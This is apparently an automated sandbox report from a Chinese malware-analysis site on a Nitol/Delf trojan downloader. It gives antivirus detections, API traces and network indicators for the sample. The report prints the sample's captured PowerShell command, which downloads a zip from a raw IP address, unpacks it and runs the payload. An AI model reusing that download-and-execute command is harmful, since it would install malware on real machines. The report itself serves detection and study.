8.0
高危
44 个模型检测该样本为恶意!
重新分析
更多

8d554a5f3cc60af16fa56cf9eb35f749b16e5e97a5b1c07072a7ce0d3d22cb8c

8b85136d433852a0e15f8d3c74373445.exe

分析耗时

90s

最近分析

文件大小

1.1MB
静态报毒 动态报毒 CLOUD DELF ECUF FALSESIGN FMWBUS GDSDA GENERICKD GENERICR INVALIDSIG MEYO NITOL R255164 SUSPICIOUS PE UKEZF UWAMSON WZ3UDZPMPG0 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee GenericR-OWW!8B85136D4338 20190503 6.0.6.653
Alibaba TrojanDownloader:Win32/Nitol.abc4a52c 20190426 0.4.0.6
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20190507 18.4.3895.0
Tencent Win32.Trojan.Falsesign.Ecuf 20190508 1.0.0.1
Kingsoft 20190508 2013.8.14.323
CrowdStrike 20190212 1.0
静态指标
Queries for the computername (8 个事件)
Time & API Arguments Status Return Repeated
1620946633.32716
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.622001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.653001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.684001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973014.715001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973020.215001
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1620973020.215001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620973021.340001
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 个事件)
Time & API Arguments Status Return Repeated
1620973015.575001
IsDebuggerPresent
failed 0 0
Uses Windows APIs to generate a cryptographic key (50 out of 66 个事件)
Time & API Arguments Status Return Repeated
1620973017.544001
CryptExportKey
crypto_handle: 0x006684f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.794001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.794001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.794001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.840001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.840001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.840001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.856001
CryptExportKey
crypto_handle: 0x006683b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.903001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.903001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.919001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.919001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.934001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973018.934001
CryptExportKey
crypto_handle: 0x006678f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.262001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.294001
CryptExportKey
crypto_handle: 0x00667e38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x00667d38
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.778001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.794001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.794001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.794001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.872001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973019.887001
CryptExportKey
crypto_handle: 0x006681f8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.012001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.012001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.012001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.028001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.028001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.028001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.044001
CryptExportKey
crypto_handle: 0x00668138
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.122001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.122001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.340001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.340001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.340001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.340001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.340001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.356001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1620973020.356001
CryptExportKey
crypto_handle: 0x006677b8
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
This executable is signed
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1620973011.544001
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 个事件)
section .itext
section .didata
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (50 out of 159 个事件)
Time & API Arguments Status Return Repeated
1620973014.903001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 1835008
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02ac0000
success 0 0
1620973014.903001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c40000
success 0 0
1620973015.419001
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
1620973015.590001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01d6a000
success 0 0
1620973015.590001
NtProtectVirtualMemory
process_identifier: 2216
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f32000
success 0 0
1620973015.590001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01d62000
success 0 0
1620973015.887001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01de2000
success 0 0
1620973016.044001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c41000
success 0 0
1620973016.106001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c42000
success 0 0
1620973016.309001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f3a000
success 0 0
1620973016.715001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01de3000
success 0 0
1620973017.044001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01de4000
success 0 0
1620973017.090001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f4b000
success 0 0
1620973017.090001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f47000
success 0 0
1620973017.262001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01d6b000
success 0 0
1620973017.450001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f32000
success 0 0
1620973017.481001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f45000
success 0 0
1620973018.059001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01de5000
success 0 0
1620973018.747001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f3c000
success 0 0
1620973018.856001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f33000
success 0 0
1620973018.903001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x05090000
success 0 0
1620973019.169001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01de6000
success 0 0
1620973019.262001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f4c000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f34000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f35000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f36000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f37000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f38000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01f39000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a0000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a1000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a2000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a3000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a4000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a5000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a6000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a7000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a8000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a9000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054aa000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ab000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ac000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ad000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ae000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054af000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b0000
success 0 0
1620973019.512001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b1000
success 0 0
1620973019.528001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b2000
success 0 0
1620973019.575001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b3000
success 0 0
1620973019.575001
NtAllocateVirtualMemory
process_identifier: 2216
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b4000
success 0 0
Creates a shortcut to an executable file (1 个事件)
file C:\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (1 个事件)
cmdline C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (New-Object Net.WebClient).DownloadFile('http://192.198.89.219/Demeter0402.zip?vivadeverdadeamor','C:\OSKAR-PC\obTKsNtL.zip');(new-object -com shell.application).namespace('C:\OSKAR-PC').CopyHere((new-object -com shell.application).namespace('C:\OSKAR-PC\obTKsNtL.zip').Items(),16);Start-ProcessC:\OSKAR-PC\Demeter0402
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1620973021.465001
GetAdaptersAddresses
flags: 15
family: 0
failed 111 0
Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 个事件)
Time & API Arguments Status Return Repeated
1620973017.247001
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 172.217.24.14
host 192.198.89.219
Deletes executed files from disk (1 个事件)
file C:\OSKAR-PC\obTKsNtL.zip
Creates a suspicious Powershell process (1 个事件)
value Uses powershell to execute a file download from the command line
Generates some ICMP traffic
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 192.198.89.219:80
File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 个事件)
MicroWorld-eScan Trojan.GenericKD.31668118
FireEye Trojan.GenericKD.31668118
CAT-QuickHeal Trojan.Nitol
McAfee GenericR-OWW!8B85136D4338
Zillya Trojan.Nitol.Win32.27
Alibaba TrojanDownloader:Win32/Nitol.abc4a52c
K7GW Trojan-Downloader ( 0054720c1 )
K7AntiVirus Trojan-Downloader ( 0054720c1 )
Cyren W32/Trojan.MEYO-6824
Symantec Trojan.Gen.2
TrendMicro-HouseCall TROJ_GEN.F0C2C00B519
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Nitol.gen
BitDefender Trojan.GenericKD.31668118
NANO-Antivirus Trojan.Win32.Nitol.fmwbus
AegisLab Trojan.Win32.Nitol.4!c
Avast Win32:Malware-gen
Tencent Win32.Trojan.Falsesign.Ecuf
Sophos Mal/Generic-S
F-Secure Trojan.TR/Nitol.ukezf
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.F0C2C00B519
McAfee-GW-Edition GenericR-OWW!8B85136D4338
Emsisoft Trojan.GenericKD.31668118 (B)
Ikarus Trojan.SuspectCRC
Avira TR/Nitol.ukezf
Fortinet W32/Nitol!tr
Antiy-AVL Trojan/Win32.Nitol
Arcabit Trojan.Generic.D1E33796
ZoneAlarm HEUR:Trojan.Win32.Nitol.gen
Microsoft Program:Win32/Uwamson.A!ml
AhnLab-V3 Trojan/Win32.Agent.R255164
ALYac Trojan.GenericKD.31668118
ESET-NOD32 a variant of Win32/TrojanDownloader.Delf.CPY
Rising Downloader.Delf!8.16F (CLOUD)
Yandex Trojan.Nitol!WZ3udZpmPG0
SentinelOne DFI - Suspicious PE
eGambit PE.Heur.InvalidSig
GData Trojan.GenericKD.31668118
Ad-Aware Trojan.GenericKD.31668118
AVG Win32:Malware-gen
Cybereason malicious.d43385
Panda Trj/GdSda.A
Qihoo-360 Win32/Trojan.8f0
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2019-02-04 21:33:30

Imports

Library kernel32.dll:
0x4e12a8 SetFilePointer
0x4e12ac GetACP
0x4e12b0 CloseHandle
0x4e12b4 LocalFree
0x4e12b8 SuspendThread
0x4e12bc VirtualProtect
0x4e12c0 GetTickCount
